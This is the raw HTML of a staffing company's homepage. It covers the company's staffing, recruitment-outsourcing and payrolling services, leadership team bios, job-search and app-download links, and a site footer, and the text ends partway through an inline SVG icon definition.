</div> </div> <div class="eluide351be56 col-md-6 col-sm-6 znColumnElement" id="eluide351be56" > <div class="znColumnElement-innerWrapper-eluide351be56 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="zn-buttonWrapper zn-buttonWrapper-eluid28affd6b text-center"><a href="https://irionline.jobs.net/en-US/" id="eluid28affd6b" class="eluid28affd6b zn-button btn btn-fullcolor btn-md btn-block btn-fullwidth btn--square btn-icon--before" title="Search for Jobs" target="_self" itemprop="url" ><span class="zn-buttonText">Find a Job</span></a></div> </div> </div> </div> </div> </div> </section> <section class="zn_section eluidb27f13d9 section-sidemargins section--no " id="eluidb27f13d9" > <div class="zn_section_size container zn-section-height--auto zn-section-content_algn--middle "> <div class="row "> <div class="eluid082d098e col-md-12 col-sm-12 znColumnElement" id="eluid082d098e" > <div class="znColumnElement-innerWrapper-eluid082d098e znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <h1 class="eluid5982d615 dn-heading" id="eluid5982d615" itemprop="headline" >Our Workforce Talent</h1> </div> </div> </div> <div class="eluidb33215e4 col-lg-offset-1 col-md-offset-1 col-md-2 col-sm-2 znColumnElement" id="eluidb33215e4" > <div class="znColumnElement-innerWrapper-eluidb33215e4 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="kl-iconbox eluidb72c58ff kl-iconbox--type-icon kl-iconbox--align-center text-center kl-iconbox--theme-light element-scheme--light" id="eluidb72c58ff"> <div class="kl-iconbox__inner clearfix"> <div class="kl-iconbox__icon-wrapper "> <span class="kl-iconbox__icon kl-iconbox__icon--" data-zniconfam="fontello" data-zn_icon=""></span> </div><!-- /.kl-iconbox__icon-wrapper --> <div class="kl-iconbox__content-wrapper"> <div class="kl-iconbox__el-wrapper kl-iconbox__title-wrapper"> <h3 class="kl-iconbox__title element-scheme__hdg1" itemprop="headline" >Life Sciences</h3> </div> </div><!-- /.kl-iconbox__content-wrapper --> </div> </div> </div> </div> </div> <div class="eluidd6973a5a col-md-2 col-sm-2 znColumnElement" id="eluidd6973a5a" > <div class="znColumnElement-innerWrapper-eluidd6973a5a znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="kl-iconbox eluidebdc0715 kl-iconbox--type-icon kl-iconbox--align-center text-center kl-iconbox--theme-light element-scheme--light" id="eluidebdc0715"> <div class="kl-iconbox__inner clearfix"> <div class="kl-iconbox__icon-wrapper "> <span class="kl-iconbox__icon kl-iconbox__icon--" data-zniconfam="fontello" data-zn_icon=""></span> </div><!-- /.kl-iconbox__icon-wrapper --> <div class="kl-iconbox__content-wrapper"> <div class="kl-iconbox__el-wrapper kl-iconbox__title-wrapper"> <h3 class="kl-iconbox__title element-scheme__hdg1" itemprop="headline" >Healthcare</h3> </div> </div><!-- /.kl-iconbox__content-wrapper --> </div> </div> </div> </div> </div> <div class="eluid44e46bb0 col-md-2 col-sm-2 znColumnElement" id="eluid44e46bb0" > <div class="znColumnElement-innerWrapper-eluid44e46bb0 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="kl-iconbox eluid45da2543 kl-iconbox--type-icon kl-iconbox--align-center text-center kl-iconbox--theme-light element-scheme--light" id="eluid45da2543"> <div class="kl-iconbox__inner clearfix"> <div class="kl-iconbox__icon-wrapper "> <span class="kl-iconbox__icon kl-iconbox__icon--" data-zniconfam="fontello" data-zn_icon=""></span> </div><!-- /.kl-iconbox__icon-wrapper --> <div class="kl-iconbox__content-wrapper"> <div class="kl-iconbox__el-wrapper kl-iconbox__title-wrapper"> <h3 class="kl-iconbox__title element-scheme__hdg1" itemprop="headline" >IT</h3> </div> </div><!-- /.kl-iconbox__content-wrapper --> </div> </div> </div> </div> </div> <div class="eluid6bcc780c col-md-2 col-sm-2 znColumnElement" id="eluid6bcc780c" > <div class="znColumnElement-innerWrapper-eluid6bcc780c znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="kl-iconbox eluid6672d706 kl-iconbox--type-icon kl-iconbox--align-center text-center kl-iconbox--theme-light element-scheme--light" id="eluid6672d706"> <div class="kl-iconbox__inner clearfix"> <div class="kl-iconbox__icon-wrapper "> <span class="kl-iconbox__icon kl-iconbox__icon--" data-zniconfam="fontello" data-zn_icon=""></span> </div><!-- /.kl-iconbox__icon-wrapper --> <div class="kl-iconbox__content-wrapper"> <div class="kl-iconbox__el-wrapper kl-iconbox__title-wrapper"> <h3 class="kl-iconbox__title element-scheme__hdg1" itemprop="headline" >Engineering</h3> </div> </div><!-- /.kl-iconbox__content-wrapper --> </div> </div> </div> </div> </div> <div class="eluid9df8400e col-md-2 col-sm-2 znColumnElement" id="eluid9df8400e" > <div class="znColumnElement-innerWrapper-eluid9df8400e znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="kl-iconbox eluidfc3c0be8 kl-iconbox--type-icon kl-iconbox--align-center text-center kl-iconbox--theme-light element-scheme--light" id="eluidfc3c0be8"> <div class="kl-iconbox__inner clearfix"> <div class="kl-iconbox__icon-wrapper "> <span class="kl-iconbox__icon kl-iconbox__icon--" data-zniconfam="fontello" data-zn_icon=""></span> </div><!-- /.kl-iconbox__icon-wrapper --> <div class="kl-iconbox__content-wrapper"> <div class="kl-iconbox__el-wrapper kl-iconbox__title-wrapper"> <h3 class="kl-iconbox__title element-scheme__hdg1" itemprop="headline" >Business Professional</h3> </div> </div><!-- /.kl-iconbox__content-wrapper --> </div> </div> </div> </div> </div> </div> </div> </section> <section class="zn_section eluid357ddc05 section-sidemargins section--no " id="eluid357ddc05" > <div class="zn_section_size container zn-section-height--auto zn-section-content_algn--middle "> <div class="row "> <div class="eluid58a87f9a col-md-12 col-sm-12 znColumnElement" id="eluid58a87f9a" > <div class="znColumnElement-innerWrapper-eluid58a87f9a znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <h1 class="eluid95df7eae dn-heading" id="eluid95df7eae" itemprop="headline" >Reinforce your workforce</h1><h2 class="eluid42536b18 dn-heading" id="eluid42536b18" itemprop="headline" >Integrated Resources, Inc. is a corporate staffing solutions company that helps you find, attract, and keep talented professionals nationwide.</h2> </div> </div> </div> <div class="eluid21c5237f col-md-4 col-sm-4 znColumnElement" id="eluid21c5237f" > <div class="znColumnElement-innerWrapper-eluid21c5237f znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="services_box eluid5324a832 home-services servicebox-sch--light element-scheme--light services_box--modern sb--hasicon" > <div class="services_box__inner clearfix"> <div class="services_box__icon"><div class="services_box__icon-inner"><span data-zniconfam="fontello" data-zn_icon="" class="services_box__fonticon text-custom"></span></div></div><div class="services_box__content"><h4 class="services_box__title element-scheme__hdg1 " itemprop="headline" >Staffing Solutions</h4><div class="services_box__desc"><p>Find talented professionals for a wide range of positions across your company in either contract, contract-to-hire or direct hire scenarios.</p></div><div class="services_box__list-wrapper"><span class="services_box__list-bg"></span></div></div> </div> <!-- end box --> </div> <div class="zn-buttonWrapper zn-buttonWrapper-eluidb618e4c7 text-left"><a href="https://irionline.com/staffing/" id="eluidb618e4c7" class="eluidb618e4c7 zn-button btn btn-fullcolor btn-block btn-fullwidth btn--square btn-icon--before" title="Staffing Solutions, Staffing Solutions Services, Strategic Staffing Solutions" target="_self" itemprop="url" ><span class="zn-buttonText">Learn More</span></a></div> </div> </div> </div> <div class="eluid2f27869d col-md-4 col-sm-4 znColumnElement" id="eluid2f27869d" > <div class="znColumnElement-innerWrapper-eluid2f27869d znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="services_box eluid9fd47653 home-services servicebox-sch--light element-scheme--light services_box--modern sb--hasicon" > <div class="services_box__inner clearfix"> <div class="services_box__icon"><div class="services_box__icon-inner"><span data-zniconfam="fontello" data-zn_icon="" class="services_box__fonticon text-custom"></span></div></div><div class="services_box__content"><h4 class="services_box__title element-scheme__hdg1 " itemprop="headline" >RPO Solutions</h4><div class="services_box__desc"><p>Take a hands-off approach to sourcing and hiring the right individual for the job with recruitment process outsourcing solutions from IRI.</p></div><div class="services_box__list-wrapper"><span class="services_box__list-bg"></span></div></div> </div> <!-- end box --> </div> <div class="zn-buttonWrapper zn-buttonWrapper-eluidd17c877f text-left"><a href="https://irionline.com/rpo/" id="eluidd17c877f" class="eluidd17c877f zn-button btn btn-fullcolor btn-block btn-fullwidth btn--square btn-icon--before" title="RPO Solutions, Recruitment Process Outsourcing, RPO Services" target="_self" itemprop="url" ><span class="zn-buttonText">Learn More</span></a></div> </div> </div> </div> <div class="eluid7f1884c7 col-md-4 col-sm-4 znColumnElement" id="eluid7f1884c7" > <div class="znColumnElement-innerWrapper-eluid7f1884c7 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="services_box eluidb4dc31c2 home-services servicebox-sch--light element-scheme--light services_box--modern sb--hasicon" > <div class="services_box__inner clearfix"> <div class="services_box__icon"><div class="services_box__icon-inner"><span data-zniconfam="glyphicons_halflingsregular" data-zn_icon="" class="services_box__fonticon text-custom"></span></div></div><div class="services_box__content"><h4 class="services_box__title element-scheme__hdg1 " itemprop="headline" >Payrolling Solutions</h4><div class="services_box__desc"><p>Simplify your regular payroll needs with a comprehensive payrolling solution tailored to your organization.</p></div><div class="services_box__list-wrapper"><span class="services_box__list-bg"></span></div></div> </div> <!-- end box --> </div> <div class="zn-buttonWrapper zn-buttonWrapper-eluid3dbfeb56 text-left"><a href="https://irionline.com/payrolling/" id="eluid3dbfeb56" class="eluid3dbfeb56 zn-button btn btn-fullcolor btn-block btn-fullwidth btn--square btn-icon--before" title="Payrolling Solutions, Payroll & Benefit Solutions" target="_self" itemprop="url" ><span class="zn-buttonText">Learn More</span></a></div> </div> </div> </div> </div> </div> </section> <section class="zn_section eluid8eeab91f zn_parallax section-sidemargins zn_section--relative section--no " id="eluid8eeab91f" > <div class="zn-bgSource zn-bgSource-imageParallax js-znParallax" ><div class="zn-bgSource-image" style="background-image:url(https://irionline.com/wp-content/uploads/2018/07/0.jpg);background-repeat:no-repeat;background-position:center center;background-size:cover"></div><div class="zn-bgSource-overlay" style="background-color:rgba(0,0,0,0.3)"></div></div> <div class="zn_section_size container zn-section-height--auto zn-section-content_algn--middle "> <div class="row "> <div class="eluid9ecc93b5 col-md-12 col-sm-12 znColumnElement" id="eluid9ecc93b5" > <div class="znColumnElement-innerWrapper-eluid9ecc93b5 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> </div> </div> </div> </div> </div> </section> <section class="zn_section eluid7b462b42 section-sidemargins section--no " id="eluid7b462b42" > <div class="zn_section_size container zn-section-height--auto zn-section-content_algn--middle "> <div class="row "> <div class="eluid8725397f col-md-12 col-sm-12 znColumnElement" id="eluid8725397f" > <div class="znColumnElement-innerWrapper-eluid8725397f znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <h1 class="eluidab0a534b dn-heading" id="eluidab0a534b" itemprop="headline" >Meet the Leadership Team</h1> </div> </div> </div> <div class="eluidc6c79177 col-md-3 col-sm-3 znColumnElement" id="eluidc6c79177" > <div class="znColumnElement-innerWrapper-eluidc6c79177 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="team_member team-member u-trans-all-2s eluid58ad3e21 teambox--light element-scheme--light teambox-style--hover" ><a href="https://www.linkedin.com/in/andykadiwar/" class="grayHover team-member-link" target="_blank" rel="noopener" itemprop="url" ><img class="team-member-img" src="https://irionline.com/wp-content/uploads/2018/06/Headshot-Andy-270x270_c.jpg" width="270" height="270" alt="" title=""/></a><h4 class="team-member-name" itemscope="itemscope" itemtype="https://schema.org/Person" >Andy Kadiwar</h4><h6 class="team-member-pos">President</h6><div class="details team-member-details"><div class="desc team-member-desc"><p>A background in pharmacy and many other segments give Andy the insight and expertise needed to be instrumental in formulating winning staffing strategies for IRI and our clients. </p></div></div><!-- end details --></div><!-- end team_member --> </div> </div> </div> <div class="eluid4fe4957d col-md-3 col-sm-3 znColumnElement" id="eluid4fe4957d" > <div class="znColumnElement-innerWrapper-eluid4fe4957d znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="team_member team-member u-trans-all-2s eluid91aec5cb teambox--light element-scheme--light teambox-style--hover" ><a href="https://www.linkedin.com/in/gary-gambhir-10687a1/" class="grayHover team-member-link" target="_blank" rel="noopener" itemprop="url" ><img class="team-member-img" src="https://irionline.com/wp-content/uploads/2018/07/0-4-270x270_c.jpg" width="270" height="270" alt="" title=""/></a><h4 class="team-member-name" itemscope="itemscope" itemtype="https://schema.org/Person" >Gary Gambhir</h4><h6 class="team-member-pos">CEO</h6><div class="details team-member-details"><div class="desc team-member-desc"><p>Nearly two decades of experience in the staffing world allows Gary to provide the vision and leadership that IRI needs to become a nationally recognized talent recruitment firm.</p></div></div><!-- end details --></div><!-- end team_member --> </div> </div> </div> <div class="eluidea30ce92 col-md-3 col-sm-3 znColumnElement" id="eluidea30ce92" > <div class="znColumnElement-innerWrapper-eluidea30ce92 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="team_member team-member u-trans-all-2s eluid206669ca teambox--light element-scheme--light teambox-style--hover" ><a href="https://www.linkedin.com/in/ralph-bellisano-339735/" class="grayHover team-member-link" target="_blank" rel="noopener" itemprop="url" ><img class="team-member-img" src="https://irionline.com/wp-content/uploads/2018/07/0-5-270x270_c.jpg" width="270" height="270" alt="" title=""/></a><h4 class="team-member-name" itemscope="itemscope" itemtype="https://schema.org/Person" >Ralph Bellisano</h4><h6 class="team-member-pos">Vice President</h6><div class="details team-member-details"><div class="desc team-member-desc"><p>Ralph boasts an impressive track record of exceeding all expectations and helped IRI achieve consistent and healthy growth through expertly managed client relationships. </p></div></div><!-- end details --></div><!-- end team_member --> </div> </div> </div> <div class="eluid78b4363d col-md-3 col-sm-3 znColumnElement" id="eluid78b4363d" > <div class="znColumnElement-innerWrapper-eluid78b4363d znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="team_member team-member u-trans-all-2s eluid3b579706 teambox--light element-scheme--light teambox-style--hover" ><a href="https://www.linkedin.com/in/margarita-m-quintero-414b088/" class="grayHover team-member-link" target="_blank" rel="noopener" itemprop="url" ><img class="team-member-img" src="https://irionline.com/wp-content/uploads/2018/06/Headshot-Margarita-270x270_c.jpg" width="270" height="270" alt="" title=""/></a><h4 class="team-member-name" itemscope="itemscope" itemtype="https://schema.org/Person" >Margarita Quintero</h4><h6 class="team-member-pos">HR Manager</h6><div class="details team-member-details"><div class="desc team-member-desc"><p>Margarita is a self-motivated leader with extensive experience building multiple best-in-class leadership teams. She is adept at delivering outstanding results while exceeding cost and quality targets. </p></div></div><!-- end details --></div><!-- end team_member --> </div> </div> </div> <div class="eluid171510ee col-md-3 col-sm-3 znColumnElement" id="eluid171510ee" > <div class="znColumnElement-innerWrapper-eluid171510ee znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="team_member team-member u-trans-all-2s eluidd6406e66 teambox--light element-scheme--light teambox-style--hover" ><a href="https://www.linkedin.com/in/psonal/" class="grayHover team-member-link" target="_blank" rel="noopener" itemprop="url" ><img class="team-member-img" src="https://irionline.com/wp-content/uploads/2018/06/Headshot-Sonal-270x270_c.jpg" width="270" height="270" alt="" title=""/></a><h4 class="team-member-name" itemscope="itemscope" itemtype="https://schema.org/Person" >Sonal Patel</h4><h6 class="team-member-pos">Director of Delivery & Recruiting</h6><div class="details team-member-details"><div class="desc team-member-desc"><p>Sonal is instrumental in articulating and implementing effective delivery process strategies that produce higher performance and goal achievement rates across the board. </p></div></div><!-- end details --></div><!-- end team_member --> </div> </div> </div> <div class="eluidbb26c758 col-md-3 col-sm-3 znColumnElement" id="eluidbb26c758" > <div class="znColumnElement-innerWrapper-eluidbb26c758 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="team_member team-member u-trans-all-2s eluid83534080 teambox--light element-scheme--light teambox-style--hover" ><a href="https://www.linkedin.com/in/vidhuirionline/" class="grayHover team-member-link" target="_blank" rel="noopener" itemprop="url" ><img class="team-member-img" src="https://irionline.com/wp-content/uploads/2018/06/Headshot-Vidhu-270x270_c.jpg" width="270" height="270" alt="" title=""/></a><h4 class="team-member-name" itemscope="itemscope" itemtype="https://schema.org/Person" >Vidhu Nijhawan</h4><h6 class="team-member-pos">Director of Strategic Accounts</h6><div class="details team-member-details"><div class="desc team-member-desc"><p>A passion for life sciences, in-depth knowledge of drug life cycles, and a decade of experience under her belt make Vidhu a strategic member of our team.</p></div></div><!-- end details --></div><!-- end team_member --> </div> </div> </div> <div class="eluid4fdb4c7a col-md-3 col-sm-3 znColumnElement" id="eluid4fdb4c7a" > <div class="znColumnElement-innerWrapper-eluid4fdb4c7a znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-top znColumnElement-innerWrapper--halign-left " > <div class="znColumnElement-innerContent"> <div class="team_member team-member u-trans-all-2s eluid4c4c4aa3 teambox--light element-scheme--light teambox-style--hover" ><a href="https://www.linkedin.com/in/himanshu-bhatt-83084816/" class="grayHover team-member-link" target="_blank" rel="noopener" itemprop="url" ><img class="team-member-img" src="https://irionline.com/wp-content/uploads/2018/07/0-6-270x270_c.jpg" width="270" height="270" alt="" title=""/></a><h4 class="team-member-name" itemscope="itemscope" itemtype="https://schema.org/Person" >Himanshu Bhatt</h4><h6 class="team-member-pos">Director - India</h6><div class="details team-member-details"><div class="desc team-member-desc"><p>Himanshu is incredibly well-versed in the organizational and detail-oriented aspects of HR, Admin, and Operations, which allows him to effectively strategize and prioritize multiple tasks at once with a great attitude and amazing results.</p></div></div><!-- end details --></div><!-- end team_member --> </div> </div> </div> </div> </div> </section> <section class="zn_section eluid82cbcae7 section-sidemargins section--no " id="eluid82cbcae7" > <div class="zn_section_size full_width zn-section-height--auto zn-section-content_algn--top "> <div class="row gutter-0"> <div class="eluid660cc887 col-md-6 col-sm-6 znColumnElement" id="eluid660cc887" > <div class="znColumnElement-innerWrapper-eluid660cc887 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-center znColumnElement-innerWrapper--halign-center " > <div class="znColumnElement-innerContent"> <h1 class="eluiddd7ec59e dn-heading" id="eluiddd7ec59e" itemprop="headline" >The perfect job is waiting for your expertise</h1><div class="zn_text_box eluid13ecd8c2 zn_text_box-dark element-scheme--dark" ><p><span style="color: #ffffff;">Browse top career opportunities with recognizable companies in the healthcare, technology, or utility sectors</span></p> </div><div class="zn-buttonWrapper zn-buttonWrapper-eluid1f63dd64 text-left"><a href="https://irionline.jobs.net/en-US/" id="eluid1f63dd64" class="eluid1f63dd64 zn-button btn btn-lined btn--square btn-icon--before" title="Land your dream job today" target="_self" itemprop="url" ><span class="zn-buttonText">Find a Job</span></a></div> </div> </div> </div> <div class="eluide1e66658 col-md-6 col-sm-6 znColumnElement" id="eluide1e66658" > <div class="znColumnElement-innerWrapper-eluide1e66658 znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-center znColumnElement-innerWrapper--halign-center " > <div class="znColumnElement-innerContent"> <h1 class="eluid7b66dba2 dn-heading" id="eluid7b66dba2" itemprop="headline" >The right candidate is looking for your brand</h1><div class="zn_text_box eluidbe1a2803 zn_text_box-dark element-scheme--dark" ><p><span style="color: #ffffff;">The perfect fit for your open position is out there and waiting for your company. Let us help you find them.</span></p> </div><div class="zn-buttonWrapper zn-buttonWrapper-eluidac8ee32e text-left"><a href="/find-talent/" id="eluidac8ee32e" class="eluidac8ee32e zn-button btn btn-lined btn--square btn-icon--before" title="Find Top Talent" target="_self" itemprop="url" ><span class="zn-buttonText">Find Talent</span></a></div> </div> </div> </div> <div class="eluid070704ad col-md-6 col-sm-6 znColumnElement" id="eluid070704ad" > <div class="znColumnElement-innerWrapper-eluid070704ad znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-center znColumnElement-innerWrapper--halign-center " > <div class="znColumnElement-innerContent"> <h1 class="eluid3f79e128 dn-heading" id="eluid3f79e128" itemprop="headline" >Download our app!</h1><p class="eluid5a6bec07 dn-heading" id="eluid5a6bec07" itemprop="headline" >Now available on the Apple App Store and Google Play Store</p><div class="image-boxes imgbox-simple eluid39246c18 image-boxes-cover-fit-img" ><a href="https://play.google.com/store/apps/details?id=com.integratedresources" class="image-boxes-link imgboxes-wrapper u-mb-0 " target="_self" itemprop="url" ><div class="image-boxes-img-wrapper img-align-center"><img class="image-boxes-img img-responsive cover-fit-img" src="https://irionline.com/wp-content/uploads/2018/05/Layer-0.png" alt="" title="Layer 0" /></div></a></div><div class="image-boxes imgbox-simple eluid9882718c image-boxes-cover-fit-img" ><a href="https://itunes.apple.com/us/app/integrated-resources/id1334262570?mt=8" class="image-boxes-link imgboxes-wrapper u-mb-0 " target="_self" itemprop="url" ><div class="image-boxes-img-wrapper img-align-center"><img class="image-boxes-img img-responsive cover-fit-img" src="https://irionline.com/wp-content/uploads/2018/05/Layer-1.png" alt="" title="Layer 1" /></div></a></div> </div> </div> </div> <div class="eluid4f0d6e4e col-md-6 col-sm-6 znColumnElement" id="eluid4f0d6e4e" > <div class="znColumnElement-innerWrapper-eluid4f0d6e4e znColumnElement-innerWrapper znColumnElement-innerWrapper--valign-center znColumnElement-innerWrapper--halign-center " > <div class="znColumnElement-innerContent"> <h1 class="eluid52834dd7 dn-heading" id="eluid52834dd7" itemprop="headline" >Join our talent network</h1><div class="zn-buttonWrapper zn-buttonWrapper-eluidb74ba138 text-center"><a href="https://irionline.jobs.net/en-US/join" id="eluidb74ba138" class="eluidb74ba138 zn-button btn btn-lined btn-lg btn--square btn-icon--before" title="Job Searching Just Got Easy" target="_self" itemprop="url" ><span class="zn-buttonText">Join Now</span></a></div> </div> </div> </div> </div> </div> </section> </div> <footer id="footer" class="site-footer" role="contentinfo" itemscope="itemscope" itemtype="https://schema.org/WPFooter" > <div class="container"> <div class="row"><div class="col-sm-3"><div id="media_image-3" class="widget widget_media_image"><h3 class="widgettitle title m_title m_title_ext text-custom">Integrated Resources Inc.</h3><img width="300" height="141" src="https://irionline.com/wp-content/uploads/2018/05/banner_IR14-300x141.png" class="image wp-image-8 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="https://irionline.com/wp-content/uploads/2018/05/banner_IR14-300x141.png 300w, https://irionline.com/wp-content/uploads/2018/05/banner_IR14-768x361.png 768w, https://irionline.com/wp-content/uploads/2018/05/banner_IR14-1024x482.png 1024w, https://irionline.com/wp-content/uploads/2018/05/banner_IR14-280x132.png 280w, https://irionline.com/wp-content/uploads/2018/05/banner_IR14-750x350.png 750w, https://irionline.com/wp-content/uploads/2018/05/banner_IR14.png 1058w" sizes="(max-width: 300px) 100vw, 300px" /></div></div><div class="col-sm-3"><div id="text-3" class="widget widget_text"><h3 class="widgettitle title m_title m_title_ext text-custom">About</h3> <div class="textwidget"><p>It is our great pride and mission to help companies grow and evolve their hiring process through the streamlined addition of top talent and consistent support as a strategic partner and employer of choice.</p> </div> </div></div><div class="col-sm-3"><div id="text-5" class="widget widget_text"><h3 class="widgettitle title m_title m_title_ext text-custom">Contact</h3> <div class="textwidget"><p>Phone: <a class="fl r-i9SVXJmy_6So" title="Call via Hangouts" href="https://www.google.com/search?q=integrated+resources+inc&amp;oq=integrated+resources+inc&amp;aqs=chrome.0.0j69i60l2j0l3.3060j0j1&amp;sourceid=chrome&amp;ie=UTF-8#" data-number="+17325492030" data-pstn-out-call-url="" data-rtid="i9SVXJmy_6So" data-ved="0ahUKEwiXqrT_n4rbAhUh4oMKHWq4D4kQkAgIyAEoADAR">(732) 549-2030</a></p> <p>Address: <a href="/contact">View our offices</a></p> <p>Email: <a class="fl r-i9SVXJmy_6So" title="Call via Hangouts" href="mailto:[email protected]" data-number="+17325492030" data-pstn-out-call-url="" data-rtid="i9SVXJmy_6So" data-ved="0ahUKEwiXqrT_n4rbAhUh4oMKHWq4D4kQkAgIyAEoADAR">[email protected]</a></p> </div> </div></div><div class="col-sm-3"><div id="nav_menu-3" class="widget widget_nav_menu"><h3 class="widgettitle title m_title m_title_ext text-custom">Navigation</h3><div class="menu-primary-container"><ul id="menu-primary-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-6 current_page_item menu-item-24 active"><a href="https://irionline.com/">Home</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-110"><a href="https://irionline.com/about/">About</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-215"><a href="#">Services</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-109"><a href="https://irionline.com/staffing/">Staffing Solutions</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-136"><a href="https://irionline.com/rpo/">Recruitment Process Outsourcing</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-135"><a href="https://irionline.com/payrolling/">Payrolling</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-222"><a href="#">Careers</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-223"><a href="https://irionline.com/why-work-with-iri/">Why Work with IRI</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-318"><a target="_blank" href="https://irionline.jobs.net/en-US/search">Current Openings</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-227"><a href="#">Insights</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-228"><a href="https://irionline.com/news-and-updates/">News and Updates</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-314"><a href="https://irionline.com/community-initiatives/">Community Initiatives</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-165"><a href="https://irionline.com/contact/">Contact</a></li> </ul></div></div></div></div><!-- end row --><div class="row"><div class="col-sm-6"></div><div class="col-sm-6"></div></div><!-- end row --> <div class="row"> <div class="col-sm-12"> <div class="bottom site-footer-bottom clearfix"> <ul class="social-icons sc--normal clearfix"><li class="social-icons-li title">GET SOCIAL</li><li class="social-icons-li"><a data-zniconfam="kl-social-icons" data-zn_icon="" href="https://www.facebook.com/Integrated-Resources-Inc-192970164133844/" target="_blank" title="Facebook" class="social-icons-item scfooter-icon-"></a></li><li class="social-icons-li"><a data-zniconfam="kl-social-icons" data-zn_icon="" href="https://twitter.com/iristaff" target="_blank" title="Twitter" class="social-icons-item scfooter-icon-"></a></li><li class="social-icons-li"><a data-zniconfam="kl-social-icons" data-zn_icon="" href="https://www.youtube.com/channel/UCcHtzakc0q-h-o_b7ZMWvtw/videos" target="_blank" title="YouTube" class="social-icons-item scfooter-icon-"></a></li><li class="social-icons-li"><a data-zniconfam="kl-social-icons" data-zn_icon="" href="https://www.linkedin.com/company/integrated-resources" target="_blank" title="Linkedin" class="social-icons-item scfooter-icon-"></a></li><li class="social-icons-li"><a data-zniconfam="kl-social-icons" data-zn_icon="" href="https://plus.google.com/106841896442250985983" target="_blank" title="Google Plus" class="social-icons-item scfooter-icon-"></a></li></ul> <div class="copyright footer-copyright"> <p class="footer-copyright-text">© 2018 Integrated Resources Inc.</p> </div><!-- end copyright --> </div> <!-- end bottom --> </div> </div> <!-- end row --> </div> </footer> </div><!-- end page_wrapper --> <a href="#" id="totop" class="u-trans-all-2s js-scroll-event" data-forch="300" data-visibleclass="on--totop">TOP</a> <svg style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <defs> <symbol id="icon-znb_close-thin" viewBox="0 0 100 100"> <path d="m87.801 12.801c-1-1-2.6016-1-3.5 0l-33.801 33.699-34.699-34.801c-1-1-2.6016-1-3.5 0-1 1-1 2.6016 0 3.5l34.699 34.801-34.801 34.801c-1 1-1 2.6016 0 3.5 0.5 0.5 1.1016 0.69922 1.8008 0.69922s1.3008-0.19922 1.8008-0.69922l34.801-34.801 33.699 33.699c0.5 0.5 1.1016 0.69922 1.8008 0.69922 0.69922 0 1.3008-0.19922 1.8008-0.69922 1-1 1-2.6016 0-3.5l-33.801-33.699 33.699-33.699c0.89844-1 0.89844-2.6016 0-3.5z"/> </symbol> <symbol id="icon-znb_play" viewBox="0 0 22 28"> <path d="M21.625 14.484l-20.75 11.531c-0.484 0.266-0.875 0.031-0.875-0.516v-23c0-0.547 0.391-0.781 0.875-0.516l20.75 11.531c0.484 0.266 0.484 0.703 0 0.969z"></path> 